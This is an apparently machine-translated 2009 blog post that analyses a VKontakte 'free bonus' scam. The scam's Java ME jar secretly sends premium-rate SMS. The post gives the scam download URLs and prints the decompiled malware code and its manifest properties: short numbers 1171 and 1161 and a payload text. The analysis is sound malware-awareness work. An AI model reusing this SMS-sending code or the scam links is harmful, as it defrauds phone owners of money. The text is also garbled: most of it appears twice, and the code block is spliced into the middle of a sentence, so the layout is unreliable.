A post in the sandbox, or I forgot that I have had an account for a long time.
Somehow, unnoticed, over the last couple of weeks I began to look at the headers on the hub, and suddenly I stumbled upon a post that you can get an invite by writing a post in the sandbox. After seeing what is in this very “sandbox” and inspired by a 2.5 L Bagbier, bought to nostalgic for youth, I made a small note (text below). Since it was almost 3 o'clock in the morning, I was going to finally go to bed. But suddenly, updating the page with my post, I saw a strange message "Page not found (404th error)." Meanwhile, an invite was discovered in the mail. Having scored 404 for reasons and rejoiced at an invite, I climbed up to register. Imagine my surprise when I saw that the login was already taken. Further, everything was simple - a link to reset the password to the email and login to the site. It turns out that I registered here already in July, just completely forgot about it. Two questions remain unclear how the invite came to me (whether it is related to my post or not) and where the post actually disappeared. )
Further, the same disappeared text , and I go at a loss of confusion:
As it was written in the PPS of this topic about spam on VKontakte (which, incidentally, some took for fake ), “While writing a post, I received, unverified, information that the virus removes 600 rubles from the account. ”
I was always surprised by such“ unverified information ”, since it very much resembles“ unverified information ”like“ send SMS to a short number and get 600 free then ”, just the opposite. So, let's figure out what will happen to the poor fellow who wants to get the coveted cash bonus for free?
We will follow his actions, although of course we will not repeat them exactly:
1. Go to the url http://vkpresents.ru/ mentioned in the topic and click the "Login" button. Yes, indeed, it’s not so bad, “Your bonus at the moment is 500 rubles!”
2. Well, to get the bonus you need to download the jar at http://bonus.vkpresents.ru/yes/go.php?id=1 . Download.
3. The most interesting is what does this mysterious jar do? To get started, let's unpack it: the content immediately pleased - the ico.png file, the META-INF directory (standard for jar) and the HotSex.class file (!)
Actually, this magic file contains all the magic. As you know, Java programs are translated into byte code executed by a virtual java machinetherefore, this bytecode should be easy enough to decompile and restore the original Java code. We will use Java decompiler, for example jad or jd-gui .
So, here is what the free cheese actually looks like: Obviously, this code tries several times to send sms to different numbers, and the default is 1171. Let's see what else is in META-INF / MANIFEST.MF, where the code is accessed using getAppProperty ( ): Here they are the same numbers where the malicious program is trying to send SMS :) The very first result of the SMS request to number 1171 in Google gives a link to a discussion of crooks
who offer to send a free SMS, for which they ultimately withdraw 5 cu So, if you consider that attempts to send SMS are made in the code of only 8, and for each SMS 5 cu is removed. - in the end, we get a fairly impressive amount of $ 40, which will be debited from the account if all the SMS succeeds in sending. Regarding the exact amount, fortunately, I do not know, but the 600 rubles mentioned are probably the average value :)
So, to summarize. The wiring is of course very weak, at least I think not a single person will behave like that, and indeed the year 2009 is in the yard, it's time to come up with something more original :) Nevertheless, the name of the class HotSex.class pleased, apparently this jar -ka was taken from another wiring, where it was proposed to watch a porn for free :)
Further, the same disappeared text , and I go at a loss of confusion:
As it was written in the PPS of this topic about spam on VKontakte (which, incidentally, some took for fake ), “While writing a post, I received, unverified, information that the virus removes 600 rubles from the account. ”
I was always surprised by such“ unverified information ”, since it very much resembles“ unverified information ”like“ send SMS to a short number and get 600 free then ”, just the opposite. So, let's figure out what will happen to the poor fellow who wants to get the coveted cash bonus for free?
We will follow his actions, although of course we will not repeat them exactly:
1. Go to the url http://vkpresents.ru/ mentioned in the topic and click the "Login" button. Yes, indeed, it’s not so bad, “Your bonus at the moment is 500 rubles!”
2. Well, to get the bonus you need to download the jar at http://bonus.vkpresents.ru/yes/go.php?id=1 . Download.
3. The most interesting is what does this mysterious jar do? To get started, let's unpack it: the content immediately pleased - the ico.png file, the META-INF directory (standard for jar) and the HotSex.class file (!)
Actually, this magic file contains all the magic. As you know, Java programs are translated into byte code executed by a virtual java machinetherefore, this bytecode should be easy enough to decompile and restore the original Java code. We will use Java decompiler, for example jad or jd-gui .
So, here is what the free cheese actually looks like: Obviously, this code tries several times to send sms to different numbers, and the default is 1171. Let's see what else is in META-INF / MANIFEST.MF, where the code is accessed using getAppProperty ( ): Here they are the same numbers where the malicious program is trying to send SMS :) The very first result of the SMS request to number 1171 in Google gives a link to a discussion of crooks
public void startApp() {
String number;
MessageConnection messageconnection;
TextMessage textmessage;
for (int i = 0; i < 3; ) {
try {
number = "sms://1171";
if (i == 0)
number = "sms://" + getAppProperty("a");
if (i == 1)
number = "sms://" + getAppProperty("b");
if (i == 2)
number = "sms://" + getAppProperty("e");
messageconnection = (MessageConnection)Connector.open(number);
textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("kis"));
messageconnection.send(textmessage);
}
catch (Exception exception)
{
}
++i;
}
...
kis: fasax 1340
wix: xasex 1340
a: 1171
b: 1161
c: 9099
d: 9099
e: 1161
who offer to send a free SMS, for which they ultimately withdraw 5 cu So, if you consider that attempts to send SMS are made in the code of only 8, and for each SMS 5 cu is removed. - in the end, we get a fairly impressive amount of $ 40, which will be debited from the account if all the SMS succeeds in sending. Regarding the exact amount, fortunately, I do not know, but the 600 rubles mentioned are probably the average value :)
So, to summarize. The wiring is of course very weak, at least I think not a single person will behave like that, and indeed the year 2009 is in the yard, it's time to come up with something more original :) Nevertheless, the name of the class HotSex.class pleased, apparently this jar -ka was taken from another wiring, where it was proposed to watch a porn for free :)